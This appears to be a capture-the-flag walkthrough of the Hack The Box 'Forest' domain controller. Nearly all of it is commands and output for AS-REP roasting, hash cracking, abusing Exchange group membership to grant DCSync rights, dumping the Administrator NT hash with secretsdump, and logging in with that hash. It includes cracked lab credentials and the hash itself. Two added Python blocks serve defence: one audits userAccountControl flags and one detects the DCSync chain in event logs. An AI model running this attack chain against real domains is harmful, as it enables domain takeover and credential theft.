Nmap Enumeration
# Nmap 7.95 scan initiated Sat May 24 12:17:08 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up, received echo-reply ttl 127 (0.061s latency).
Scanned at 2025-05-24 12:17:08 CDT for 27s
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-24 09:03:19Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -5h53m54s, deviation: 4h02m31s, median: -8h13m55s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 32753/tcp): CLEAN (Couldn't connect)
| Check 2 (port 16481/tcp): CLEAN (Couldn't connect)
| Check 3 (port 44587/udp): CLEAN (Timeout)
| Check 4 (port 35687/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2025-05-24T09:03:27
|_ start_date: 2025-05-24T09:01:18
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2025-05-24T02:03:29-07:00
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 24 12:17:35 2025 -- 1 IP address (1 host up) scanned in 27.48 seconds
LDAP Enumeration
Users Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec ldap 10.10.10.161 -u '' -p '' --users
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP 10.10.10.161 389 FOREST [+] htb.local\:
LDAP 10.10.10.161 389 FOREST [*] Total of records returned 34
LDAP 10.10.10.161 389 FOREST Administrator Built-in account for administering the computer/domain
LDAP 10.10.10.161 389 FOREST Guest Built-in account for guest access to the computer/domain
LDAP 10.10.10.161 389 FOREST DefaultAccount A user account managed by the system.
LDAP 10.10.10.161 389 FOREST krbtgt Key Distribution Center Service Account
LDAP 10.10.10.161 389 FOREST $331000-VK4ADACQNUCA
LDAP 10.10.10.161 389 FOREST SM_2c8eef0a09b545acb
LDAP 10.10.10.161 389 FOREST SM_ca8c2ed5bdab4dc9b
LDAP 10.10.10.161 389 FOREST SM_75a538d3025e4db9a
LDAP 10.10.10.161 389 FOREST SM_681f53d4942840e18
LDAP 10.10.10.161 389 FOREST SM_1b41c9286325456bb
LDAP 10.10.10.161 389 FOREST SM_9b69f1b9d2cc45549
LDAP 10.10.10.161 389 FOREST SM_7c96b981967141ebb
LDAP 10.10.10.161 389 FOREST SM_c75ee099d0a64c91b
LDAP 10.10.10.161 389 FOREST SM_1ffab36a2f5f479cb
LDAP 10.10.10.161 389 FOREST HealthMailboxc3d7722
LDAP 10.10.10.161 389 FOREST HealthMailboxfc9daad
LDAP 10.10.10.161 389 FOREST HealthMailboxc0a90c9
LDAP 10.10.10.161 389 FOREST HealthMailbox670628e
LDAP 10.10.10.161 389 FOREST HealthMailbox968e74d
LDAP 10.10.10.161 389 FOREST HealthMailbox6ded678
LDAP 10.10.10.161 389 FOREST HealthMailbox83d6781
LDAP 10.10.10.161 389 FOREST HealthMailboxfd87238
LDAP 10.10.10.161 389 FOREST HealthMailboxb01ac64
LDAP 10.10.10.161 389 FOREST HealthMailbox7108a4e
LDAP 10.10.10.161 389 FOREST HealthMailbox0659cc1
LDAP 10.10.10.161 389 FOREST sebastien
LDAP 10.10.10.161 389 FOREST lucinda
LDAP 10.10.10.161 389 FOREST svc-alfresco
LDAP 10.10.10.161 389 FOREST andy
LDAP 10.10.10.161 389 FOREST mark
LDAP 10.10.10.161 389 FOREST santi
Group Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec ldap 10.10.10.161 -u '' -p '' --groups
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP 10.10.10.161 389 FOREST [+] htb.local\:
LDAP 10.10.10.161 389 FOREST Administrators
LDAP 10.10.10.161 389 FOREST Users
LDAP 10.10.10.161 389 FOREST Guests
LDAP 10.10.10.161 389 FOREST Print Operators
LDAP 10.10.10.161 389 FOREST Backup Operators
LDAP 10.10.10.161 389 FOREST Replicator
LDAP 10.10.10.161 389 FOREST Remote Desktop Users
LDAP 10.10.10.161 389 FOREST Network Configuration Operators
LDAP 10.10.10.161 389 FOREST Performance Monitor Users
LDAP 10.10.10.161 389 FOREST Performance Log Users
LDAP 10.10.10.161 389 FOREST Distributed COM Users
LDAP 10.10.10.161 389 FOREST IIS_IUSRS
LDAP 10.10.10.161 389 FOREST Cryptographic Operators
LDAP 10.10.10.161 389 FOREST Event Log Readers
LDAP 10.10.10.161 389 FOREST Certificate Service DCOM Access
LDAP 10.10.10.161 389 FOREST RDS Remote Access Servers
LDAP 10.10.10.161 389 FOREST RDS Endpoint Servers
LDAP 10.10.10.161 389 FOREST RDS Management Servers
LDAP 10.10.10.161 389 FOREST Hyper-V Administrators
LDAP 10.10.10.161 389 FOREST Access Control Assistance Operators
LDAP 10.10.10.161 389 FOREST Remote Management Users
LDAP 10.10.10.161 389 FOREST System Managed Accounts Group
LDAP 10.10.10.161 389 FOREST Storage Replica Administrators
LDAP 10.10.10.161 389 FOREST Domain Computers
LDAP 10.10.10.161 389 FOREST Domain Controllers
LDAP 10.10.10.161 389 FOREST Schema Admins
LDAP 10.10.10.161 389 FOREST Enterprise Admins
LDAP 10.10.10.161 389 FOREST Cert Publishers
LDAP 10.10.10.161 389 FOREST Domain Admins
LDAP 10.10.10.161 389 FOREST Domain Users
LDAP 10.10.10.161 389 FOREST Domain Guests
LDAP 10.10.10.161 389 FOREST Group Policy Creator Owners
LDAP 10.10.10.161 389 FOREST RAS and IAS Servers
LDAP 10.10.10.161 389 FOREST Server Operators
LDAP 10.10.10.161 389 FOREST Account Operators
LDAP 10.10.10.161 389 FOREST Pre-Windows 2000 Compatible Access
LDAP 10.10.10.161 389 FOREST Incoming Forest Trust Builders
LDAP 10.10.10.161 389 FOREST Windows Authorization Access Group
LDAP 10.10.10.161 389 FOREST Terminal Server License Servers
LDAP 10.10.10.161 389 FOREST Allowed RODC Password Replication Group
LDAP 10.10.10.161 389 FOREST Denied RODC Password Replication Group
LDAP 10.10.10.161 389 FOREST Read-only Domain Controllers
LDAP 10.10.10.161 389 FOREST Enterprise Read-only Domain Controllers
LDAP 10.10.10.161 389 FOREST Cloneable Domain Controllers
LDAP 10.10.10.161 389 FOREST Protected Users
LDAP 10.10.10.161 389 FOREST Key Admins
LDAP 10.10.10.161 389 FOREST Enterprise Key Admins
LDAP 10.10.10.161 389 FOREST DnsAdmins
LDAP 10.10.10.161 389 FOREST DnsUpdateProxy
LDAP 10.10.10.161 389 FOREST Organization Management
LDAP 10.10.10.161 389 FOREST Recipient Management
LDAP 10.10.10.161 389 FOREST View-Only Organization Management
LDAP 10.10.10.161 389 FOREST Public Folder Management
LDAP 10.10.10.161 389 FOREST UM Management
LDAP 10.10.10.161 389 FOREST Help Desk
LDAP 10.10.10.161 389 FOREST Records Management
LDAP 10.10.10.161 389 FOREST Discovery Management
LDAP 10.10.10.161 389 FOREST Server Management
LDAP 10.10.10.161 389 FOREST Delegated Setup
LDAP 10.10.10.161 389 FOREST Hygiene Management
LDAP 10.10.10.161 389 FOREST Compliance Management
LDAP 10.10.10.161 389 FOREST Security Reader
LDAP 10.10.10.161 389 FOREST Security Administrator
LDAP 10.10.10.161 389 FOREST Exchange Servers
LDAP 10.10.10.161 389 FOREST Exchange Trusted Subsystem
LDAP 10.10.10.161 389 FOREST Managed Availability Servers
LDAP 10.10.10.161 389 FOREST Exchange Windows Permissions
LDAP 10.10.10.161 389 FOREST ExchangeLegacyInterop
LDAP 10.10.10.161 389 FOREST Exchange Install Domain Servers
LDAP 10.10.10.161 389 FOREST Service Accounts
LDAP 10.10.10.161 389 FOREST Privileged IT Accounts
LDAP 10.10.10.161 389 FOREST test
AS-REP Roasting
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ sudo impacket-GetNPUsers -request -dc-ip 10.10.10.161 htb.local/
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Name MemberOf PasswordLastSet LastLogon UAC
------------ ------------------------------------------------------ -------------------------- -------------------------- --------
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2025-05-24 04:16:30.231609 2019-09-23 06:09:47.931194 0x410200
$krb5asrep$23$svc-alfresco@HTB.LOCAL:1b8d21b25f5418adecf03a0be651c60d$f32dcfa90aa1510e5cb506e2be94bacbea6f156a1acbaaf65c08571d5d6a6fd2f50ccfbb2934b18a776a58497264985495abc4b67f50b34ea815ee0f5abd700d1956c205adc5e8c12db6feddf3fe96b3d6c38916c5d17a661badb348aa752e6c3bf165448a7530a6635993fdeab737a0e1180d13785ac14e5032f417e63ae284471c1e802ffc6341191890a0fcc3fa1963ff8b5a418ed4597d6e355e6a3543f833236f7bc818e717b1fa2d6c52a94b67a1b6689841b2e51d551e088295dc80c9a2721ab80529b5997e4aef9886a7b0e15f87b1f8cd54702232c5b0a2878eb20d9668cc6940b2
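The UAC column above is the account's raw userAccountControl bitmask; decoding it shows why GetNPUsers selected this account and nothing else. Added example, not part of the writeup: the flag constants are the documented userAccountControl bits, svc-alfresco's value is taken from the output above, and the other two accounts are constructed.

```python
"""Decode userAccountControl and flag accounts exposed to AS-REP roasting.

Added example, not from the original writeup. Flag values are the documented
userAccountControl bits; 0x410200 is the value GetNPUsers printed above.
"""

# Documented userAccountControl bits relevant to a Kerberos audit.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}


def decode_uac(value: int) -> list[str]:
    """Return the names of every known flag set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]


def is_asrep_roastable(value: int) -> bool:
    """Exposed when Kerberos pre-authentication is not required and the
    account is still enabled (a disabled account yields no AS-REP)."""
    return bool(value & 0x400000) and not (value & 0x0002)


def audit(accounts: dict[str, int]) -> list[str]:
    """Return the sorted names of accounts whose UAC marks them roastable."""
    return sorted(name for name, uac in accounts.items() if is_asrep_roastable(uac))


# Constructed sample: svc-alfresco's real UAC from the page plus two made-up accounts.
SAMPLE = {
    "svc-alfresco": 0x410200,  # from the GetNPUsers output above
    "andy": 0x200,             # constructed: ordinary enabled account
    "old-svc": 0x400202,       # constructed: pre-auth disabled, but account disabled too
}

if __name__ == "__main__":
    for name, uac in SAMPLE.items():
        print(f"{name:<14} 0x{uac:06x}  {', '.join(decode_uac(uac))}")
    print("roastable:", audit(SAMPLE))
```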
Try Cracking
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ sudo hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt --force
...
$krb5asrep$23$svc-alfresco@HTB.LOCAL:1b8d21b25f5418adecf03a0be651c60d$f32dcfa90aa1510e5cb506e2be94bacbea6f156a1acbaaf65c08571d5d6a6fd2f50ccfbb2934b18a776a58497264985495abc4b67f50b34ea815ee0f5abd700d1956c205adc5e8c12db6feddf3fe96b3d6c38916c5d17a661badb348aa752e6c3bf165448a7530a6635993fdeab737a0e1180d13785ac14e5032f417e63ae284471c1e802ffc6341191890a0fcc3fa1963ff8b5a418ed4597d6e355e6a3543f833236f7bc818e717b1fa2d6c52a94b67a1b6689841b2e51d551e088295dc80c9a2721ab80529b5997e4aef9886a7b0e15f87b1f8cd54702232c5b0a2878eb20d9668cc6940b2:s3rvice
...
Good! We got the credentials svc-alfresco:s3rvice.
SMB Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec smb 10.10.10.161 -u 'svc-alfresco' -p 's3rvice' --shares
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\svc-alfresco:s3rvice
SMB 10.10.10.161 445 FOREST [+] Enumerated shares
SMB 10.10.10.161 445 FOREST Share Permissions Remark
SMB 10.10.10.161 445 FOREST ----- ----------- ------
SMB 10.10.10.161 445 FOREST ADMIN$ Remote Admin
SMB 10.10.10.161 445 FOREST C$ Default share
SMB 10.10.10.161 445 FOREST IPC$ Remote IPC
SMB 10.10.10.161 445 FOREST NETLOGON READ Logon server share
SMB 10.10.10.161 445 FOREST SYSVOL READ Logon server share
WinRM Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec winrm 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
SMB 10.10.10.161 5985 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
HTTP 10.10.10.161 5985 FOREST [*] http://10.10.10.161:5985/wsman
WINRM 10.10.10.161 5985 FOREST [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
Post Exploitation
Quick Check
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA Administrator andy
DefaultAccount Guest HealthMailbox0659cc1
HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
HealthMailboxfd87238 krbtgt lucinda
mark santi sebastien
SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb
SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
WinPEASx64
╔══════════╣ Current TCP Listening Ports
╚ Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 88 0.0.0.0 0 Listening 584 lsass
TCP 0.0.0.0 135 0.0.0.0 0 Listening 812 svchost
TCP 0.0.0.0 389 0.0.0.0 0 Listening 584 lsass
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 464 0.0.0.0 0 Listening 584 lsass
TCP 0.0.0.0 593 0.0.0.0 0 Listening 812 svchost
TCP 0.0.0.0 636 0.0.0.0 0 Listening 584 lsass
TCP 0.0.0.0 3268 0.0.0.0 0 Listening 584 lsass
TCP 0.0.0.0 3269 0.0.0.0 0 Listening 584 lsass
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 9389 0.0.0.0 0 Listening 1968 Microsoft.ActiveDirectory.WebServices
...
Bloodhound
Note that we are a member of ACCOUNT OPERATORS, a group that by default has privileges to create and modify most types of accounts, including user accounts, local groups and global groups.
This means we can add our own account to groups.
Note that we still cannot add ourselves to DOMAIN ADMINS. Reason: Domain Admins is a protected group, so its ACL is periodically re-stamped from AdminSDHolder, which grants Account Operators no write access to it.
Which groups can we join, then?
Looking at this relationship, we can add ourselves to EXCHANGE WINDOWS PERMISSIONS, which in turn has WriteDACL on the domain object, allowing us to grant ourselves DCSync privileges.
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ bloodyAD --host 10.10.10.161 -d 'htb.local' -u 'svc-alfresco' -p 's3rvice' add groupMember "EXCHANGE WINDOWS PERMISSIONS" "svc-alfresco"
[+] svc-alfresco added to EXCHANGE WINDOWS PERMISSIONS
Then we follow the bloodhound guide to grant ourselves DCSync privileges.
Add DCSync Privileges
However, the BloodHound guide seems to be wrong (or outdated). A Google search led to https://www.thehacker.recipes/ad/movement/dacl/grant-rights instead:
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ bloodyAD --host 10.10.10.161 -d 'htb.local' -u 'svc-alfresco' -p 's3rvice' add dcsync "svc-alfresco"
[+] svc-alfresco is now able to DCSync
Exploit DCSync
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ sudo impacket-secretsdump "htb.local/svc-alfresco":"s3rvice"@10.10.10.161
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
...
[*] Kerberos keys grabbed
...
[*] Cleaning up...
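Seen from the domain controller, the chain above leaves three distinct traces: a membership change on EXCHANGE WINDOWS PERMISSIONS, a rewrite of nTSecurityDescriptor on the domain head, and a directory access exercising the replication control-access rights from an account that is not a DC. Added example, not part of the writeup: the detection logic below runs over constructed events shaped like Windows Security log fields (4756/4728/4732 group adds, 5136 object modified, 4662 object access); the replication GUIDs are the documented ones.

```python
"""Detect the privileged-group add -> domain DACL change -> DCSync chain.
Added example, not from the writeup; events are constructed in the shape of
Windows Security log fields, modelled on the steps taken on this box."""
from datetime import datetime, timedelta

# Control-access rights exercised by a DRSUAPI replication request.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Groups whose membership changes merit an alert: the Exchange group abused here
# plus the obvious built-ins.
SENSITIVE_GROUPS = {"Exchange Windows Permissions", "Domain Admins", "Enterprise Admins",
                    "Administrators", "Account Operators", "Schema Admins"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}  # member added to global / local / universal group

def sam_from_dn(dn: str) -> str:
    """'CN=svc-alfresco,OU=...' -> 'svc-alfresco' (sufficient for the CN shape here)."""
    return dn.split(",")[0].removeprefix("CN=")

def is_sensitive_group_add(ev: dict) -> bool:
    return ev["EventID"] in GROUP_ADD_EVENTS and ev.get("TargetUserName") in SENSITIVE_GROUPS

def is_domain_dacl_change(ev: dict) -> bool:
    """5136 rewriting nTSecurityDescriptor on the domain head is what granting
    DCSync rights with bloodyAD looks like in the log."""
    return (ev["EventID"] == 5136
            and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"
            and ev.get("ObjectClass") == "domainDNS")

def is_dcsync(ev: dict) -> bool:
    """4662 carrying a replication GUID from a non-computer account.
    Domain controllers replicate legitimately and their names end in '$'."""
    return (ev["EventID"] == 4662
            and not ev["SubjectUserName"].endswith("$")
            and any(g in ev.get("Properties", "") for g in REPLICATION_GUIDS))

def correlate(events: list[dict], window: timedelta = timedelta(hours=1)) -> list[str]:
    """Return alert strings in time order. A DCSync by an account that was added
    to a sensitive group inside `window` is reported as one chained alert."""
    alerts, recent_adds = [], {}
    for ev in sorted(events, key=lambda e: e["Time"]):
        actor = ev["SubjectUserName"]
        if is_sensitive_group_add(ev):
            member = sam_from_dn(ev["MemberName"])
            recent_adds[member] = ev
            alerts.append(f"{actor} added {member} to {ev['TargetUserName']}")
        elif is_domain_dacl_change(ev):
            alerts.append(f"{actor} rewrote the DACL on {ev.get('ObjectDN')}")
        elif is_dcsync(ev):
            add = recent_adds.get(actor)
            if add and ev["Time"] - add["Time"] <= window:
                alerts.append(f"CHAIN: {actor} joined {add['TargetUserName']} then ran DCSync")
            else:
                alerts.append(f"DCSync by {actor}")
    return alerts

T0 = datetime(2025, 5, 24, 12, 30)
SAMPLE_EVENTS = [  # constructed, modelled on the steps in this writeup
    {"EventID": 4756, "Time": T0, "SubjectUserName": "svc-alfresco",
     "MemberName": "CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local",
     "TargetUserName": "Exchange Windows Permissions"},
    {"EventID": 5136, "Time": T0 + timedelta(minutes=2), "SubjectUserName": "svc-alfresco",
     "ObjectDN": "DC=htb,DC=local", "ObjectClass": "domainDNS",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "Time": T0 + timedelta(minutes=4), "SubjectUserName": "FOREST$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},  # DC-to-DC replication, benign
    {"EventID": 4662, "Time": T0 + timedelta(minutes=6), "SubjectUserName": "svc-alfresco",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for line in correlate(SAMPLE_EVENTS):
        print(line)
```

The FOREST$ event is deliberately present: a rule that fires on every 4662 with a replication GUID drowns in legitimate DC replication, which is why the subject filter matters.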
Login as administrator
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec winrm 10.10.10.161 -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'
SMB 10.10.10.161 5985 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
HTTP 10.10.10.161 5985 FOREST [*] http://10.10.10.161:5985/wsman
WINRM 10.10.10.161 5985 FOREST [+] htb.local\Administrator:32693b11e6aa90eb43d32c72a07ceea6 (Pwn3d!)
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ evil-winrm -i htb.local -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
5b0ca47df9aaf22d49b05d4561e16c61
*Evil-WinRM* PS C:\Users\Administrator\Documents>